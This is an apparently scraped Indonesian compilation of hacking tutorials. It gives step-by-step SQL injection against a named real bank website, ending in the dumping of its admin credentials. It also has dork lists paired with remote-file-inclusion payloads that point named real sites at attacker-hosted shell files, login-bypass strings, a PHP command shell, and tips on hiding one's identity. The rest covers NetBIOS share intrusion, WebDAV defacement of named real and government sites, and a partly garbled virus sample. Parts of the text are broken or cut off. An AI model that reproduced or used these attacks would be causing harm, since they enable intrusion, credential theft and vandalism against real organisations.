Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :
1. Menemukan target
Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.
N0LDR “Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”
Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):
Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010
Dari sekian banyak calon korban, maka: http://www.bankpapua.com/kantor.php?jenis=2 merupakan target saya pada tutorial sederhana ini.
N0LDR “Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”
2. Mencari celah kelemahan
Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.
(-) ditambahkan sebelum item pada query seperti berikut: http://www.bankpapua.com/kantor.php?jenis=-2 (‘) ditambahkan sesudah item pada query seperti berikut: http://www.bankpapua.com/kantor.php?jenis=2’
Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118
3. Mendapatkan jumlah kolom
Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:
http://www.bankpapua.com/kantor.php?jenis=2+order+by+1-- http://www.bankpapua.com/kantor.php?jenis=2+order+by+2-- http://www.bankpapua.com/kantor.php?jenis=2+order+by+3-- http://www.bankpapua.com/kantor.php?jenis=2+order+by+4-- http://www.bankpapua.com/kantor.php?jenis=2+order+by+5-- . . . Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118
Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)
4. Mendapatkan angka keberuntungan
Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:
[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.
5. Mendapatkan versi database server
Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:
Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.
6. Mendapatkan nama tabel
Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:
Kita mendapatkan nama-nama tabel sebagai berikut: adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga, galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz, polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:
http://www.dolcevie.com/js/converter.html
kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)
7. Mendapatkan nama kolom
Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:
0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut: ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.
8. Mendapatkan Data
Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:
Terenkripsi Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/
N0LDR “Tutorial ini hanya sebagai pembelajaran semata. Hacking is good” sumber : jasakom.com
Artikel Asli Berjudul Hack Website menggunakan SQL injection di www.perwira28.blogspot.com Under Creative Commons License: Attribution Non-Commercial
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Nah itu artinya SQL Injection, untuk translate ke bahasa sesuai yg ada mengerti silahkan di translate sendiri. :D. Ok, SQL Injection itu sendiri dapat terjadi oleh beberapa faktor, di antaranya kesalahan setting pada server yang memungkinkan seorang attacker memasukkan karakter dan baris perintah yg membahayakan bagi program, selain itu juga kesalahan dalam coding yg tidak memfilter karakter yg diinputkan oleh user.
Sudah cukup basa basinya.. sekarang sedikit tutorialnya.. :D. Pertama., carilah sasaran yang mau di injek - injek SQL nya.. Lha nyarinya dimana mas?? tanya lah pada rumput yg bergoyang dombret nyarinya… wjwkwkwkwk.. Nyari di google, misal’e dengan kata kunci
inurl:news.php?id= site:com
Nah.. buanyak bgt kan hasilnya…. sekarang tinggal kita coba satu buat test.. Misal kita menemukan sebuah site dengan alamat sebagai berikut….
http://www.target.com/english/news.php?id=64
Tahap selanjutnya mari kita tambahkan tanda petik (’) diakhir angka 64.. Ups… ternyata muncul kek gini..
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
Mungkin pada nanya.. mangnya kenapa kalo muncul kek gitu mas..?? Ya itu tandanya error kawand… dah nemu yg asyik error nya.. mari kita lanjutkan ketahap berikutnya.., Ilangkan saja tanda ‘ nya, ganti dengan tanda - (minus) jadi seperti berikut
http://www.target.com/english/news.php?id=-64+order+by+100– Keterangan : angka 100 itu untuk mencari field nya, tanda minus double di belakang digunakan untuk memberikan Comment pada Mysql Query sehingga sistem tidak akan menjalankan perintah selanjutnya.
setelah ditulis kek gitu… ternyata terdapat error.. like this
Unknown column ‘100' in ‘order clause’
Weeh… Column 100 ndak ada katanya… kita perkecil lagi… coba angka angka misal 10,9 dll ok. Sampai dia tidak memunculkan error unknown column tadi… Setelah di dapat angka yang tidak memunculkan error trus langkah selanjutnya kepriben kiye… (walah boso ngendi maneh.. @_@)…
Buat langkah selanjutnya marih kita select column column tersebut. Lha nyara select nya piye, begini, mari kita coba dengan cara yg sederhana.. misalnya tadi g ada error di coloum 9 so, perintahnya like this
Ok, dah running querynya di address bar, tunggu beberapa saat dan berharaplah akan muncul suatu mukjizat.. wkwkwkwkwkwkw. Nah setelah loading selesai, liad di browser, angka berapa ajah yg muncul… (tempat munculnya di tempat seharusnya artikel ato berita muncul). Misal’e yang muncul tuh angka 3, mari kita explore lebih jauh lagi… kita lihat versi dari databasenya. caranya dengan menjalakan seperti ini
Nah, setelah itu bakal muncul deh versi dari databasenya, bisa aja versinya 5.2, ato 4.0 atau yg lainnya. Setelah dapet versi databasenya, lanjutin deh buat ngedapetin yang namanya table - table nya. Lha caranye gimana Om??? Wes ga usah panjang x lebar, tar jadi luas wkwkwkw… Untuk mysql versi 5, kita bisa manfaatin yang namanya Information_schema, nah kalo versi 4, ya kita hanya bisa berdoa dan berharap alias maen tebak tebakan… wkwkwkwkwkw.
Buat mencari nama table table nya bisa kita lakuin dengan cara seperti ini.
Query diatas bakal menghasilkan nama nama table yg ada di database sesuai dengan nama database yg di gunakan, dan sudah dech kita tinggal pilih table mana yg bakal kita extract colom2 nya dan buat kita cari isi dari colom2 nya.. :D. . Lha cara mengetahui column nya gmn mas??? Nah lho.. lom taut tho… Ok, buat cari tau nama nama column nya kita butuh bantuin sebuah alat yg gunanya buat meng-convert code ascii ke hexa, gunanya buat mengambil nama column berdasar nama table nya..
Nh tak kasih sekalian website yg nyedian fasilitas buat ngonvert hexa to ascii, bisa di coba di http://centricle.com/tools/ascii-hex/ tinggal kalian masukin nama table dah jadi dech kode ascii nya.. :D dan kita tinggal meng-query buat ngedapetin nama column nya seperti ini
Pernah dengar istilah NetBIOS over TCP/IP?Kalau sudah, sebaiknya lewatkan saja tulisan ini Dan jika belom boleh disimak :) Tulisan ini tujuan hanya sebagai pembelajaran saja dan agar dapat kita selalu berhati hati. :) Informasi NetBios sebenarnya dapat kita pakai untuk exploitasi sistem lawan dan berikut ini suatu caruntuk exploitasi target yang menggunakan file/printer sharring
Dalam tulisan ini saya asumsikan anda menggunakan win 98 Sebelum kita mulai coba kita find nbtstat.exe Sebenarnya fungsi file tersebut adalah untuk menampilkan statistik protokol dan koneksi tcp/ip
Langkah langkah exploitasi :) 1. Click Start-->Program-->MS-Dos prompt--> tulis nbtstat lalu enter 2. Click Start-->Run-->tulis nbtstat lalu OK
Kira kira mucul sperti ini : NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S][interval] ]
-a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names. -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name. IP address Dotted decimal representation of the IP address. interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.
Dari informasi diatas sebenarnya sudah dapat kita ketahui fungsi dari nbtstat.exe
Pada kesempatan ini saya akan coba mengulas 2 option diatas yaitu : -A -a
misal kita mau mencoba komputer dengan names belog.wasantara.net.id maka kita gunakan : nbtstat -a belog.wasantara.net.id
misal kita mau mencoba komputer dengan ip 192.168.1.1 maka kita gunakan : nbtstat -A 192.168.1.1
Dari perintah diatas kemungkinan yang muncul adalah : 1. Host not found 2. Dan pesan indah seperti dibawah ini :
--------------------------------------------
NetBIOS Local Name Table
Name Type Status --------------------------------------------- BELOG <00> UNIQUE Registered POLOS <00> GROUP Registered BELOG <03> UNIQUE Registered BELOG <20> UNIQUE Registered POLOS <1e> GROUP Registered
---------------------------------------------
Jika muncul pesan Host not found, segera hentikan usaha anda, karena akan buang waktu sia sia :)
Jika muncul pesan indah seperti diatas, sebaiknya anda tarik napas, karena perkerjaan lain akan menunggu. Dari pesan indah tersebut yang menjadi catatan adalah karakter dengan kode BELOG <20> UNIQUE Registered, karena angka 20 ini adalah informasi file dan printer sharing.
Apa langkah kita selanjutnya ? Setelah kita mempunyai info diatas, cari file yang bernama : LMHOST atau HOST (win 9x)
Jika sudah ketemu, buka dengan editor seperti noteped dan tambahkan : 192.168.1.1 BELOG
Kemudian simpan.
Selanjutnya Click Start-->Find-->Computer masukan nama atau ipnya
Dan anda pasti akan berteriak girang, karena komputer remote sudah bisa anda jadikan seperti HD secondary anda :)
Selamat :) nb : sekali lagi, mohon tulisan ini hanya sebagai bahan pembelajaran saja dan bukan digunakan untuk merusak dan dari tulisan ini saya berharap, kita jangan seenaknya membuka file/printer sharing
Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik
Pembahasan:
------------------------------------------------ keyword:inurl:"/cart.php?m=" contoh:http://www.facesbyfelicia.com/store/cart.php?m=view ganti tulisn cart.php?m=view dengan admin jadi http://www.facesbyfelicia.com/store/admin trus login pake sql username : 'or"=" password :'or"=" ------------------------------------------------ keyword inurl:"/modernbill" contoh:http://billing.ourweb.net/modernbill/ masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt? jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt? ------------------------------------------------ keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action=" contoh http://www.dohertysgym.com/sunshop/index.php ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin login pake user: admin pass: 'or''=' ------------------------------------------------ inurl:"modules.php?name=SQuery" injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt? contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt? ------------------------------------------------ google:allinurl:com_galleria injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt? contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt? ------------------------------------------------ google:allinurl:"/auth/lostPassword.php" contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php injek:ldap/authldap.php?includePath=http://one-server.us/item.txt? jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt ------------------------------------------------ google:intitle:"Multimedia Flash Website Builder" contoh:www.webdesignhq.com/sitebuilder/index.php injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt? jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt? ------------------------------------------------ gogle:"software 2004-2005 by randshop" contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt? jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt? ------------------------------------------------ keyword;"powered by geeklog" contoh:http://www.kobe-ch.com/index.php injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg? jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg? ------------------------------------------------ google:inurl:"/product.php?printable=" atau "powered by x-cart" inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin kekekek biasa sqlnya cari sendiri ya ------------------------------------------------ keyword:inurl:"/index. php?option=com_rsgallery" bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt? contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt? ------------------------------------------------ keyword:"Advanced Poll" inurl:/admin/ contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php bug:common.inc.php?base_path=http://elang13.org/item.txt? jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt? ------------------------------------------------ inurl:"powered by cs-cart" injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt? ------------------------------------------------ inurl:"/catalogue.php?cat=" ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak
inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt? inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt? inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt? inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt? inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt? ------------------------------------------------ allinurl:"dload.php" injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt? ------------------------------------------------ "powered by squirrelcart" injek : squirrelcart/cart_content.php?cart_isp_root= ------------------------------------------------ keyword inurl:/ubbthreads/ injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt? ------------------------------------------------ allinurl:"index.php?target=categories" injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt? ------------------------------------------------ google : "Exhibit Engine 1.5 RC 4" injek:photo_comment.php?toroot=http://elang13.org/item.txt? ------------------------------------------------ inurl:"/modules/Forums/ injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt? ------------------------------------------------ allinurl: includes/include_once.php bug:includes/include_once.php?include_file=http://elang13.org/item.txt? ------------------------------------------------ allinurl:/phplivehelper/blank.php injek:initiate.php?abs_path=hhttp://elang13.org/item.txt? ------------------------------------------------ google:"powered by DreamAccount" injeknya: auth.cookie.inc.php?da_path=http://elang13.org/item.txt? auth.header.inc.php?da_path=http://elang13.org/item.txt? auth.sessions.inc.php?da_path=http://elang13.org/item.txt? ------------------------------------------------ ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb ------------------------------------------------ inurl:"//comersus/" ganti /store/xxxx.asp dengan database/comersus.mdb ------------------------------------------------ allinurl:/shop/category.asp/catid= hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp ------------------------------------------------ inurl:"/admin/default.asp" username:admin password:'or''=' span style="color: rgb(51, 51, 255);">------------------------------------------------ inurl:"/metacart/" injek : database/metacart.mdb ------------------------------------------------ inurl:"/store/proddetail.asp?prod=" ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb ------------------------------------------------ inurl:"/AdminLogin.asp" login pake sql ini : usename:1'or'1'='1 password:1'or'1'='1 ------------------------------------------------ inurl:"com_a6mambocredits" http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt ------------------------------------------------ "Welcome to phpMyAdmin" inurl:main.php ------------------------------------------------ filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" ) ------------------------------------------------ inurl:"com_peoplebook" inurl:"com_comprofiler"
Php Injection (updated every day) Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya. Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari. Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya. Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.
1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya). 2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita. 3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com. Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita : Untuk forum : allinurl:my_egallery site:.org allinurl:xgallery site:.org allinurl:coppermine site:.org allinurl:4nAlbum site:.org allinurl:PNphpBB2 site:.org allinurl:ihm.php?p= allinurl:.php?bodyfile= allinurl:/default.php?page=home allinurl:/folder.php?id= allinurl:main.php?pagina= allinurl:/modules.php?name=allmyguests allinurl:AshNews atau allinurl: /ashnews.php allinurl:ihm.php?p=* allinurl:kietu/hit_js.php allinurl:/Popper/index.php? keyword : "Powered by phpBB 2.0.6" keyword : "powered by CubeCart 3.0.6" keyword : "powered by paBugs 2.0 Beta 3" Keyword : "powered by AllMyLinks" keyword : /phorum/login.php keyword : "powered eyeOs" allinurl:/includes/orderSuccess.inc.php?glob= allinurl:modules.php?name=Forums
Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword. Kalo memang rajin coba liat ajah listnya di : -= http://www.geocities.com/kake_rgb/list.txt =-
4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com atau kalau kamu tidak berhasil coba dengan list berikut : Ganti modul :
========================================================================== 5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.
6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.
Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:
passthru($test); ?>
simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.
Sekarang kita siap untuk melakukan aksi kita. Ketikkan di address bar dari browser kita alamat berikut:
jika kita berhasil maka kita akan mendapatkan respon sebagai berikut: June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
7. Nah klo kamu mau exploit coba yang satu ini : http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL] http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL] http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]
8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??
Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :
Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.
Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp
1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain
2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web
3. Buka My computer pada desktop dan lihat icon web folder
4. Klik 2 kali pada icon web folder tersebut
5. klik 2 kali pada icon add web folder
6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut
7. klik next lalu finish
8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut
9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.
10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat
11. Save di komputer anda.
12. Proses Deface selesai.
Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.
Cara Mudah Deface Remote File Include
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
4. Kalo berhasil, maka di url/browsing kamu akan muncul : www.target.com/nuke/admin.php?op=mod_author
Kalo gak, berarti situs tsb udah di path ama admin nya.
5. Kalo berhasil, disana kamu di suruh login, masukin id & password kamu tadi. Masih ingat kan ???
id=nino ==> liat point 3 diatas password=ninoalone ==> liat point 3 diatas
Nah . . . kamu sekarang sudah masuk ke "Administration Menu" situs tsb. Berarti kamu sudah mengusai situs tsb sekarang ! Hehehe...
Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu ketik :
title ==>Defaced by NinO content ==>Hey admin.......find your hole and close it..Greetz to everyone at CuPu² expiration ==> pilih unlimited trus klik tab add messages yang ada di bawah
Kalo sudah, buka url/browsing baru lalu ketikkan situs target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php
kalo nggak ada hasil deface kamu coba klik tab refresh yang ada diatas yg disamping url/browsing kamu.
haloo semua ketemu lagi nih....
ini ada sampel virus... aku dapat dari forum Smadav
silahkan yang mau uji coba yah...
copy dari sini
--------------------------------------------------------------------------------------
'FLyff 666.dll.vbs
Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : JATIxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.